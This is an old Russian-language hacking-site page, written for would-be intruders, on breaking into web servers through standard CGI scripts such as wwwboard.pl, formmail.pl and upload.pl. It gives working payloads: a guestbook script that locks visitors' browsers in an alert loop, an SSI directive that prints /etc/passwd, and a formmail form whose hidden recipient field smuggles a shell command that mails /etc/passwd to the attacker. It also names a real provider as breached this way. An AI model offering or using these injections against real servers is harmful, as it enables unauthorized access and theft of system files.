|
►Взлом
►Троян
►Разное
|
|
После
того как вы воспользовались сканером и он используя свою базу эксплойтов
нашел так называемые уязвимые места мы читаем следующее:
Известно,
что многие владельцы веб-серверов пользуются стандартными скриптами CGI
(common gateway interface), какие поставляет, например, Matt Wright (
его wwwboard.pl является, по-моему, самым распространенным скриптом на
сегодняшний день ). Либо такие скрипты входят в комплект дистрибутива
сервера, как, например, скрипт upload.pl входит в состав сервера Sambar.
И уже почти ни для кого не секрет, что данные скрипты являются одним из
тех мест, через которые либо кардер в поисках кредиток, либо подросток,
возомнивший себя c00l h4x0r0m могут получить доступ к файлам, права пользователя
или и то и другое на удалённой машине.
Методы
получения неавторизованного доступа через стандартные CGI можно подразделить
на следующие большие группы :
- Overflow.
Скрипту передаётся заведомо большой запрос, что приводит к некорректной
его обработке, и как следствие скрипт может не выполнить проверки на,
скажем, передачу управления либо совершить непредусмотренные разработчиком
действия. К скриптам такого рода относится, например, args.bat, прилагающийся
к Website 1.x. Overflow - атака позволила в своё время взломать сервер
ID Software.
- Доски/конференции.
В настоящее время есть много скриптов, пишущих данные, переданные им,
на Web-страницы. К ним относятся, например, все чаты, доски объявлений
и гостевые книги. Если скрипт не выполняет проверки входных данных на
тэги, это так же может привести к нежелательным результатам. Например
следующий Javascript в гостевой книге заставит всех, кто посмотрит её,
закрывать браузеры по kill process.
<SCRIPT>
{ while ( true ) window.alert('Game over, man'); }
</SCRIPT>
Или
же, если сервер поддерживает SSI, запись подобной строги в книгу без
проверки на тэги покажет всем кто смотрит её passwd:
<!--#exec cmd="/bin/cat
/etc/passwd"-->
- Всякие
mailer'a и прочее. Путём передачи управления, скажем, тому же sendmail'y
реально получить по почте ;-) любой файл, на доступ к которому есть
права у httpd. Скажем, если на www.host.com находится formmail, то создав
страницу со следующими полями:
<FORM Method="POST"
Action="http://www.host.com/cgi-bin/formmail.pl">
<INPUT TYPE="hidden" NAME="recipient"VALUE="some@email.com;
/bin/mail your@email.com < /etc/passwd">
можно получить пресловутый
passwd к себе в mailbox. Хочу добавить что этим способом был взломан
првайдер www.mol.ru ,, вы можете зайти и убедиться сами, на одной
из страниц, есть такая форма с использованием formmail.pl и кстати
совсем недавно они это просекли и поправили скрипт.
|
|
|